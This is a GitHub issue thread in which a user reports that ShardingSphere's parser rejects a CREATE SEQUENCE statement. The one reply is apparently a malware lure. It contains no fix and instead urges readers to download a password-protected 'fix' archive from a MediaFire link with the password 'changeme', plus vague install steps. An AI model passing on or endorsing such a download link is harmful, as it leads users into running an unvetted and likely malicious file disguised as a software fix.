### ISSUE TITLE
Add CREATE SEQUENCE support 

### ISSUE THREAD

**Issue by makssent** [red-soft-ru/shardingsphere#91]
***request:*** CREATE SEQUENCE T176

***err message:***
You have an error in your SQL syntax: CREATE SEQUENCE T176 no viable alternative at input 'CREATESEQUENCE' at line 1 position 8 near @18:15='SEQUENCE'<369>1:8

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
